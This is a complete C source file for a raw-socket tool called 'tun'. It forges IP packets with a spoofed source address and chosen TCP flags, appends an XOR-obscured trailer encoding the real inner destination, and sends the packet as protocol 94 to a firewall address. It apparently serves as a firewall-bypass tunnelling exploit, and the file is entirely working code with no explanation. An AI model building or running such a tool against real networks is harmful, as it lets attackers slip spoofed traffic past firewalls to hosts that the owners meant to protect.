
#define _BSD_SOURCE

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>

#define TUNNELPROTO 94

struct pseudo {
  unsigned long source;
  unsigned long dest;
  unsigned char zero;
  unsigned char proto;
  unsigned short len;
};

static u_short calc_sum(u_short start, u_short *buff, int bytelen)
{
  u_long sum = start;
  int wordlen;

  wordlen = bytelen / 2;
  bytelen &= 1;

  while (wordlen--)
    sum += *buff++;

  if (bytelen)
    sum += *((u_char *)buff); /* little endian only */

  sum = (sum >> 16) + (sum & 0xffff);
  sum = (sum >> 16) + (sum & 0xffff);

  return sum;
}

static void usage()
{
  fprintf(stderr, "usage: tun {tcp|udp} fw-address source-address source-port\n");
  fprintf(stderr, "           destination-address destination-port ttl\n");
  fprintf(stderr, "           [{s|a|f|r} [{s|a|f|r} [...]]]\n");
}

int main(int ac, char *av[])
{
  int i, s, res, true = 1;
  unsigned char inbuff[1000];
  int inlen;
  unsigned char dgram[1045];
  struct ip *iph;
  struct tcphdr *tcph;
  struct udphdr *udph;
  unsigned char *data;
  unsigned char *magic;
  struct sockaddr_in daddr;
  unsigned long fa, sa, da;
  unsigned short sp, dp;
  int proto;
  unsigned char xor[5] = {
    0xe0, 0x63, 0x5a, 0x06, 0xc8
  };
  int ttl;
  struct pseudo ph;

  if (ac < 8) {
    usage();
    return 1;
  }

  if (!strcmp(av[1], "tcp"))
    proto = IPPROTO_TCP;
  else if (!strcmp(av[1], "udp"))
    proto = IPPROTO_UDP;
  else {
    fprintf(stderr, "invalid protocol given\n");
    return 1;
  }

  if ((fa = inet_addr(av[2])) == (unsigned long)-1) {
    fprintf(stderr, "invalid fw address given\n");
    usage();
    return 1;
  }

  if ((sa = inet_addr(av[3])) == (unsigned long)-1) {
    fprintf(stderr, "invalid source address given\n");
    usage();
    return 1;
  }

  if (!(sp = htons(atoi(av[4])))) {
    fprintf(stderr, "invalid source port given\n");
    usage();
    return 1;
  }

  if ((da = inet_addr(av[5])) == (unsigned long)-1) {
    fprintf(stderr, "invalid destination address given\n");
    usage();
    return 1;
  }

  if (!(dp = htons(atoi(av[6])))) {
    fprintf(stderr, "invalid source port given\n");
    usage();
    return 1;
  }

  if (!(ttl = atoi(av[7]))) {
    fprintf(stderr, "invalid ttl given\n");
    usage();
    return 1;
  }

  if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
    perror("socket");
    res = 2;
  } else {
    if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &true, sizeof(true)) < 0) {
      perror("setsockopt");
      res = 3;
    } else {
      memset(&daddr, 0, sizeof (daddr));
      daddr.sin_family = AF_INET;
      daddr.sin_addr.s_addr = fa;
      
      memset(dgram, 0, sizeof (dgram));

      iph = (struct ip *)&dgram[0];
      tcph = (struct tcphdr *)&iph[1];
      udph = (struct udphdr *)&iph[1];
      if (proto == IPPROTO_TCP)
        data = (unsigned char *)&tcph[1];
      else
        data = (unsigned char *)&udph[1];

      if ((inlen = read(0, inbuff, sizeof (inbuff))) < 0) {
	perror("read");
	res = 4;
      } else {
	memcpy(data, inbuff, inlen);

	magic = &data[inlen];

	for (i = 0; i < 4; i++)
	  magic[i] = ((unsigned char *)&da)[i] ^ xor[i];

	magic[4] = proto ^ xor[4];

	ph.zero = 0;
	ph.proto = proto;
	ph.source = sa;
	ph.dest = da;

	if (proto == IPPROTO_TCP) {
	  tcph->th_sport = sp;
	  tcph->th_dport = dp;
	  tcph->th_seq = htonl(0x00000005);
	  tcph->th_ack = htonl(0x19720201);
	  tcph->th_off = 5;
	  
	  for (i = 8; i < ac; i++) {
	    if (!strcmp(av[i], "s"))
	      tcph->th_flags |= TH_SYN;
	    else if (!strcmp(av[i], "a"))
	      tcph->th_flags |= TH_ACK;
	    else if (!strcmp(av[i], "f"))
	      tcph->th_flags |= TH_FIN;
	    else if (!strcmp(av[i], "r"))
	      tcph->th_flags |= TH_RST;
	    else
	      fprintf(stderr, "skipping unknown flag: '%s'\n", av[i]);
	  }

	  tcph->th_win = htons(16384);
	  tcph->th_urp = 0;

	  ph.len = htons(magic - (unsigned char *)tcph);
	  tcph->th_sum = 0;
	  tcph->th_sum = ~calc_sum(calc_sum(0, (u_short *)&ph, 12),
				   (u_short *)tcph, ntohs(ph.len));
	  
	} else {
	  udph->uh_sport = sp;
	  udph->uh_dport = dp;
	  udph->uh_ulen = htons(magic - (unsigned char *)udph);
	
	  ph.len = udph->uh_ulen;
	  udph->uh_sum = 0;
	  udph->uh_sum = ~calc_sum(calc_sum(0, (u_short *)&ph, 12),
				   (u_short *)udph, ntohs(ph.len));
	}

	iph->ip_v = IPVERSION;
	iph->ip_hl = 5;
	iph->ip_tos = 0;
	iph->ip_len = htons(&magic[5] - dgram);
	iph->ip_id = htons(1);
	iph->ip_off = htons(0);
	iph->ip_ttl = ttl;
	iph->ip_p = TUNNELPROTO;
	iph->ip_src.s_addr = sa;
	iph->ip_dst.s_addr = fa;

	iph->ip_sum = 0;
	iph->ip_sum = ~calc_sum(0, (u_short *)iph, 20);

	if (sendto(s, &dgram, &magic[5] - dgram, 0, (struct sockaddr *)&daddr,
		   sizeof(daddr)) < 0) {
	  perror("sendto");
	  res = 5;
	} else
	  res = 0;
      }
    }
    close(s);
  }

  return res;
}
